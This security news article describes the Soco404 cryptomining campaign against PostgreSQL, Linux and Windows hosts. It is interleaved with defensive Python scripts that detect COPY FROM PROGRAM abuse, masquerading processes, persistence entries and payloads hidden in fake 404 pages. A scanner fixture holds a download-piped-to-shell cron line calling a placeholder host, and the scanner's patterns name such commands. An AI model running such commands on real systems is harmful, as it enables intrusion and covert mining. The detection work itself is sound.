Saturday, December 13, 2025

Warning – Platform-Specific Malware Targeting Linux and Windows Through Fake Error Pages

Cybersecurity researchers at Wiz have uncovered an active cryptomining campaign dubbed “Soco404” that exploits cloud infrastructure vulnerabilities to deploy platform-specific malware targeting both Linux and Windows systems.

The sophisticated operation uses fake 404 error pages hosted on Google Sites to conceal malicious payloads, demonstrating an evolved approach to cryptojacking attacks.

Multi-Vector Attack Strategy Exploits PostgreSQL Misconfigurations

The campaign primarily targets exposed PostgreSQL instances through automated scanning, exploiting weak credentials and misconfigurations to gain initial access.

Attackers leverage PostgreSQL’s COPY FROM PROGRAM functionality to achieve remote code execution, subsequently downloading and executing malicious scripts directly in memory to avoid disk-based detection.
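The initial-access stage described above can be watched for on the database side. The following Python script is an added example written for this article, not code from Wiz or from the report; the log lines and pg_hba.conf content are constructed, and the log prefix assumed is log_line_prefix = '%m [%p] %u@%d ' with log_statement set to 'mod' or 'all' (both log COPY FROM). It flags COPY ... FROM PROGRAM statements in server log output and audits pg_hba.conf for host rules that accept logins from any address, the exposure that lets automated scanners reach the instance in the first place.

```python
import re
from typing import Dict, List

# Constructed PostgreSQL server log lines (not taken from the report).
SAMPLE_LOG = """\
2025-12-13 10:01:02.114 UTC [8812] postgres@appdb LOG:  statement: SELECT count(*) FROM orders;
2025-12-13 10:01:05.201 UTC [8813] postgres@appdb LOG:  statement: COPY report FROM '/tmp/report.csv' CSV;
2025-12-13 10:01:09.377 UTC [8814] postgres@appdb LOG:  statement: COPY tmp FROM PROGRAM 'echo constructed-sample';
2025-12-13 10:01:11.005 UTC [8815] app_ro@appdb FATAL:  password authentication failed for user "app_ro"
2025-12-13 10:01:12.640 UTC [8816] postgres@appdb LOG:  statement: copy x from program 'echo again'
"""

# Constructed pg_hba.conf; line 4 is the worst case (any address, no password).
SAMPLE_PG_HBA = """\
# TYPE  DATABASE  USER  ADDRESS         METHOD
local   all       all                   peer
host    all       all   127.0.0.1/32    scram-sha-256
host    all       all   0.0.0.0/0       trust
host    all       all   0.0.0.0/0       md5
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"(?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)
# COPY ... FROM PROGRAM hands a shell command to the server process; the article
# names it as the campaign's route from a database login to code execution.
COPY_PROGRAM_RE = re.compile(r"\bCOPY\b.*?\bFROM\s+PROGRAM\b", re.IGNORECASE)


def find_copy_program(log_text: str) -> List[Dict[str, str]]:
    """Return one alert per log line whose statement uses COPY ... FROM PROGRAM."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and COPY_PROGRAM_RE.search(m.group("msg")):
            alerts.append({k: m.group(k) for k in ("ts", "pid", "user", "db", "msg")})
    return alerts


def audit_pg_hba(conf_text: str) -> List[str]:
    """Flag host rules that accept connections from any address, worst of all with 'trust'."""
    findings = []
    for lineno, line in enumerate(conf_text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split()
        if fields[0] not in ("host", "hostssl", "hostnossl") or len(fields) < 5:
            continue
        address, method = fields[3], fields[4]
        if address in ("0.0.0.0/0", "::/0", "all"):
            if method == "trust":
                findings.append(f"line {lineno}: {address} with trust allows passwordless login from anywhere")
            else:
                findings.append(f"line {lineno}: {address} exposes the server to every address; restrict to known client ranges")
    return findings


if __name__ == "__main__":
    for a in find_copy_program(SAMPLE_LOG):
        print(f"[!] pid {a['pid']} user {a['user']} db {a['db']}: {a['msg']}")
    for f in audit_pg_hba(SAMPLE_PG_HBA):
        print(f"[!] pg_hba.conf {f}")
```

COPY ... FROM PROGRAM is only available to superusers and members of pg_execute_server_program, so any hit from an application role, or any hit at all on a server whose workload never needs it, is worth an immediate look.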

The Linux variant begins with the soco.sh dropper script, which downloads the primary payload from compromised Apache Tomcat servers while eliminating competing miners and clearing forensic evidence from system logs.

The malware employs process masquerading techniques, disguising itself as legitimate system processes, such as “sd-pam” and kernel-related processes, including “[cpuhp/1]” and “[kworker/R-rcu_p]”.
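The masquerade works because ps prints a bracketed name for any process whose cmdline is empty, and a user-space program can simply set argv[0] to "[kworker/R-rcu_p]". The check below is an added example (not from Wiz or the article) that tells the two apart: a genuine kernel thread has PID 2 or parent PID 2, an empty cmdline and no /proc/PID/exe target, while a real "(sd-pam)" is forked from systemd --user without exec, so its exe still resolves to the systemd binary (assumed here to be named "systemd"). The sample process list is constructed; read_live_procs() gathers the same fields from /proc on a real host.

```python
import os
from dataclasses import dataclass
from typing import List

KTHREADD_PID = 2  # every genuine kernel thread is kthreadd or one of its children


@dataclass
class Proc:
    pid: int
    ppid: int
    comm: str     # /proc/<pid>/comm
    cmdline: str  # /proc/<pid>/cmdline with NULs replaced by spaces; "" for kernel threads
    exe: str      # target of /proc/<pid>/exe; "" when there is no backing file


def display_name(p: Proc) -> str:
    """What ps shows: argv[0], or the comm in brackets when cmdline is empty."""
    return p.cmdline.split()[0] if p.cmdline.strip() else f"[{p.comm}]"


def is_masquerading(p: Proc) -> bool:
    name = display_name(p)
    if name.startswith("[") and name.endswith("]"):
        # A real kernel thread has no cmdline, no exe, and hangs off kthreadd.
        genuine = (p.cmdline.strip() == "" and p.exe == ""
                   and (p.pid == KTHREADD_PID or p.ppid == KTHREADD_PID))
        return not genuine
    if name.strip("()") == "sd-pam":
        # Real (sd-pam) keeps systemd's executable; a separate binary posing as it does not.
        return os.path.basename(p.exe) != "systemd"
    return False


def masquerading_pids(procs: List[Proc]) -> List[int]:
    return [p.pid for p in procs if is_masquerading(p)]


def read_live_procs() -> List[Proc]:
    """Collect Proc records from /proc on a Linux host (unreadable entries are skipped)."""
    procs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            with open(f"/proc/{pid}/stat") as f:
                # fields after the ")" that closes comm: state, ppid, ...
                ppid = int(f.read().rsplit(")", 1)[1].split()[1])
            try:
                exe = os.readlink(f"/proc/{pid}/exe")
            except OSError:
                exe = ""
        except OSError:
            continue
        procs.append(Proc(pid, ppid, comm, cmdline, exe))
    return procs


# Constructed process table: three legitimate entries and three impostors.
SAMPLE_PROCS = [
    Proc(2, 0, "kthreadd", "", ""),
    Proc(23, 2, "cpuhp/1", "", ""),
    Proc(41, 2, "kworker/R-rcu_p", "", ""),
    Proc(1500, 1499, "(sd-pam)", "(sd-pam)", "/usr/lib/systemd/systemd"),
    Proc(4321, 1, "[cpuhp/1]", "[cpuhp/1]", "/tmp/.constructed/miner"),
    Proc(4322, 4321, "[kworker/R-rcu_p]", "[kworker/R-rcu_p]", "/tmp/.constructed/miner"),
    Proc(4323, 1, "sd-pam", "sd-pam", "/tmp/.constructed/miner"),
]

if __name__ == "__main__":
    procs = read_live_procs() if os.path.isdir("/proc") else SAMPLE_PROCS
    for p in procs:
        if is_masquerading(p):
            print(f"[!] pid {p.pid} ppid {p.ppid} shows as {display_name(p)!r}, exe {p.exe!r}")
```

Zombie processes also have an empty cmdline and no exe target but a parent other than kthreadd, so on a busy host read the state field from /proc/PID/stat and drop entries in state Z before alerting.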

For Windows systems, the attack utilizes multiple fallback methods, including certutil, PowerShell’s Invoke-WebRequest, and curl to download the ok.exe payload.

The Windows variant creates persistent services with random names and attempts to disable Windows event logging to evade detection.

Sophisticated Persistence and Evasion Techniques

Both variants establish robust persistence mechanisms through cron jobs and shell initialization files on Linux systems, while Windows infections create system services for automatic startup.
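A triage pass over the Linux persistence locations named above (cron tables and shell start-up files) can be scripted. This Python scanner is an added example, not part of the article or the Wiz research; the file contents below are constructed stand-ins and the URL is a placeholder. It flags entries that download straight into a shell, run something out of a world-writable temp directory, decode an inline base64 blob, or re-launch on every boot.

```python
import glob
import re
from typing import Dict, List, Tuple

# Heuristics for lines that should not normally appear in cron tables or shell start-up files.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|da)?sh\b"), "download piped straight into a shell"),
    (re.compile(r"(^|[\s=])(/tmp|/var/tmp|/dev/shm)/\S+"), "runs from a world-writable temp directory"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "decodes an inline base64 blob"),
    (re.compile(r"^\s*@reboot\b"), "@reboot entry re-launches on every boot"),
]

# Constructed file contents; the paths are typical locations, the contents are not from the report.
SAMPLE_FILES = {
    "/etc/crontab": (
        "SHELL=/bin/sh\n"
        "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
        "*/10 * * * * root curl -fsSL http://example.invalid/constructed | sh\n"
    ),
    "/var/spool/cron/crontabs/root": "@reboot /tmp/.constructed/sample >/dev/null 2>&1\n",
    "/root/.bashrc": "# ~/.bashrc\nalias ll='ls -l'\nnohup /tmp/.constructed/sample >/dev/null 2>&1 &\n",
    "/home/app/.profile": "export PATH=$HOME/bin:$PATH\n",
}


def scan_persistence(files: Dict[str, str]) -> List[Tuple[str, int, str]]:
    """Return (path, line number, reason) for every matching non-comment line."""
    findings = []
    for path, text in files.items():
        for lineno, line in enumerate(text.splitlines(), 1):
            if not line.strip() or line.lstrip().startswith("#"):
                continue
            for pattern, reason in SUSPICIOUS:
                if pattern.search(line):
                    findings.append((path, lineno, reason))
    return findings


def collect_live_files() -> Dict[str, str]:
    """Read the usual cron and shell start-up locations on a live host (missing files are skipped)."""
    paths = ["/etc/crontab", "/etc/profile",
             *glob.glob("/etc/cron.d/*"), *glob.glob("/etc/profile.d/*.sh"),
             *glob.glob("/var/spool/cron/crontabs/*"), *glob.glob("/var/spool/cron/*"),
             "/root/.bashrc", "/root/.profile",
             *glob.glob("/home/*/.bashrc"), *glob.glob("/home/*/.profile")]
    out = {}
    for p in paths:
        try:
            with open(p, encoding="utf-8", errors="replace") as f:
                out[p] = f.read()
        except OSError:
            pass  # absent, unreadable, or a directory
    return out


if __name__ == "__main__":
    files = collect_live_files() or SAMPLE_FILES
    for path, lineno, reason in scan_persistence(files):
        print(f"[!] {path}:{lineno}: {reason}")
```

Treat the output as leads rather than verdicts: a legitimate backup job may well run from /var/tmp, but a cron entry that both runs from a temp directory and fires at @reboot deserves the same scrutiny the article gives the soco.sh dropper.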

The malware spawns multiple child processes that communicate via local sockets, creating a resilient network of interconnected components.

A particularly notable aspect involves the use of Google Sites to host fake 404 error pages containing base64-encoded malware embedded within HTML content.

Figure: Fake 404 error page at htttps[://]www[.]fastsoco.top/1

These pages appear as legitimate error messages while serving as command-and-control infrastructure, with the actual payloads hidden between “exe101” markers in the HTML source.
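Given that layout (a base64 blob between two "exe101" markers inside otherwise ordinary HTML), a responder can pull the embedded file out of a saved copy of such a page and hash it for IOC matching without ever executing it. The script below is an added example, not code from Wiz or this article; the sample page is constructed and its embedded blob is harmless text. The hash set is the SHA-256 list from this article's IOC section.

```python
import base64
import hashlib
import re
from typing import Dict, List

MARKER = "exe101"
PAYLOAD_RE = re.compile(re.escape(MARKER) + r"(.*?)" + re.escape(MARKER), re.DOTALL)

# SHA-256 values from this article's IOC table.
KNOWN_SHA256 = {
    "c9bb137d56fab7d52b3dbc85ae754b79d861a118bfb99566faaa342c978285ff",
    "bac4b166dec1df8aa823a15136c82c8b50960b11a0c4da68b8d7dedcb0f3a794",
    "c67e876d7b3ae5f3c4fd626d8ba62e77bd47dfdf51f7a4438edd64bd0f88ce3a",
}

# Constructed stand-in for a fake 404 page; the embedded blob is plain text, not malware.
SAMPLE_PAYLOAD = b"constructed sample, not malware"
SAMPLE_HTML = (
    "<html><head><title>Error 404 (Not Found)</title></head>\n"
    "<body><p>The requested URL was not found on this server.</p>\n"
    "<!-- exe101" + base64.b64encode(SAMPLE_PAYLOAD).decode() + "exe101 -->\n"
    "</body></html>\n"
)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def extract_payloads(html: str) -> List[Dict[str, object]]:
    """Decode every base64 blob delimited by exe101 markers and hash it for IOC matching."""
    found = []
    for m in PAYLOAD_RE.finditer(html):
        blob = re.sub(r"\s+", "", m.group(1))  # tolerate line-wrapped base64
        try:
            data = base64.b64decode(blob, validate=True)
        except ValueError:
            continue  # text between markers that is not base64
        digest = sha256_hex(data)
        found.append({"sha256": digest, "size": len(data),
                      "known_ioc": digest in KNOWN_SHA256, "data": data})
    return found


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as f:
            html = f.read()
    else:
        html = SAMPLE_HTML
    for p in extract_payloads(html):
        print(f"{p['sha256']}  {p['size']} bytes  known_ioc={p['known_ioc']}")
```

Run it against a page saved from a sandboxed fetch; the decoded bytes are the dropped binary, so write them only to a quarantine directory and feed the digest to your blocklist or to the IOC table above rather than relying on the hash alone, since a recompiled payload changes the hash but not the marker scheme.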

The campaign extends beyond simple cryptomining, with evidence suggesting connections to broader crypto-scam infrastructure, including fraudulent cryptocurrency trading platforms.

Researchers identified multiple domains hosting fake exchanges that claim affiliation with legitimate institutions, such as the Hong Kong Stock Exchange.

Both Linux and Windows payloads ultimately connect to mining pools, including c3pool and moneroocean, using the same Monero wallet address, indicating coordinated operations.

The dynamic number of active workers suggests the campaign remains operational, highlighting the ongoing threat to exposed cloud services.

Organizations are advised to secure PostgreSQL instances, implement proper access controls, and deploy runtime monitoring solutions to detect anomalous database process behavior characteristic of these attacks.

IOC

Indicator                                                          Description
c9bb137d56fab7d52b3dbc85ae754b79d861a118bfb99566faaa342c978285ff   SHA-256 soco.sh
bac4b166dec1df8aa823a15136c82c8b50960b11a0c4da68b8d7dedcb0f3a794   SHA-256 soco.sh
c67e876d7b3ae5f3c4fd626d8ba62e77bd47dfdf51f7a4438edd64bd0f88ce3a
